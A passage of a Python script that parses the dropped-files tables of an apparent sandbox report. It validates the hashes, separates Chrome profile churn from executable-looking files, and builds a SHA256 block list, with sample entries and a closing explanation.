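# executable are written by the browser itself, not dropped by the sample.
BROWSER_PROFILE_MARKERS = ("\\google\\chrome\\user data\\",)
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".reg")

# Constructed sample input: three entries copied from the report tables above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 80364c4c1614e38aca141a450c01c071 |
| SHA1 | dea9de3e72cae5a63537cb5992874eca2edbeb4c |
| SHA256 | 4c0ab59fefe057652ec352b834a635a37b34176bdec530685dcc1079f8223d9e |
| SHA512 | 6a21c98dbb43ade9fa9675dee58b805def7dbece505402262eb97e0e442ca4ed4df21730b2e5556e69a6b70adbaa9c6b01233e5282ad2aa8a1d9e9f5daaf52a6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\70eb055f-48ca-4604-a363-2b0274176132.tmp
| MD5 | 5d80845b382095d3872e8e348ba8776a |
| SHA1 | ed4fc7c095ed0e573dcf9465e72e8c88bcd3f278 |
| SHA256 | 5aa71bee6edfbc60e0cc30e04a71490e67cfdce06e9da00a887f07247d6db33d |
| SHA512 | 67c886551a6ec50b1c4f4a300c62abfb37288274b3bdad6b3bc775fee29524d4256e3260bb608db4fef4ec58855e7981b70c3dbefd52cbcaac8603e84fce2a5c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4c452b202269d61714ecb9a4c17f533d |
| SHA1 | 6c0dc680c3c3ee990223ff827d8d053bf9061788 |
| SHA256 | 24bfa0192c98398a68175e8b8c4987c8051c4d30e59b607523431c82470fc86c |
| SHA512 | a2f1bef66dd959b9f8deb0bc3a2e761e1369bb8ebe8274cc5b1ad7d494389c46d5c8bad3ae088aadbef06009298b2a3b86f9cb783e1b607f339c724f0a84d8e2 |
"""


def parse_dropped_files(text):
    """Return one {'path': ..., 'MD5': ..., 'SHA1': ..., ...} dict per file entry."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            current = {"path": line}  # a non-table line starts a new entry
            entries.append(current)
            continue
        if current is None:
            raise ValueError(f"hash row before any path line: {line}")
        current[m.group(1)] = m.group(2).lower()
    return entries


def validate_entry(entry):
    """List what is wrong with an entry's digests; an empty list means it is clean."""
    problems = []
    for algo, length in HASH_LEN.items():
        value = entry.get(algo)
        if value is None:
            problems.append(f"missing {algo}")
        elif len(value) != length:
            problems.append(f"{algo} has {len(value)} hex chars, expected {length}")
    return problems


def classify(entry):
    """Triage bucket for a path: executable, browser-profile-churn or other."""
    path = entry["path"].lower()
    if path.endswith(EXEC_SUFFIXES):
        return "executable"  # executable-looking files are never treated as churn
    if any(marker in path for marker in BROWSER_PROFILE_MARKERS):
        return "browser-profile-churn"
    return "other"


def summarize(entries):
    """Counts showing how much of the table is rewrites of the same path."""
    by_path = Counter(e["path"] for e in entries)
    return {
        "entries": len(entries),
        "distinct_paths": len(by_path),
        "distinct_sha256": len({e["SHA256"] for e in entries if "SHA256" in e}),
        "rewrites": {p: n for p, n in by_path.items() if n > 1},
        "classes": dict(Counter(classify(e) for e in entries)),
    }


def iocs_for_blocking(entries):
    """Sorted SHA256 values worth blocking: every entry that is not browser churn."""
    return sorted({e["SHA256"] for e in entries
                   if "SHA256" in e and classify(e) != "browser-profile-churn"})


if __name__ == "__main__":
    parsed = parse_dropped_files(SAMPLE)
    for e in parsed:
        print(classify(e), validate_entry(e) or "ok", e["path"])
    print(summarize(parsed))
    print("block list:", iocs_for_blocking(parsed))
```

Run against the full dropped-files section of a report, `summarize` shows the rewrite count per path and `iocs_for_blocking` is left with the entries that actually merit a block-list line (for this section, none, since every row sits under the Chrome profile); an executable-looking file under the profile directory would still be classified as `executable` and kept.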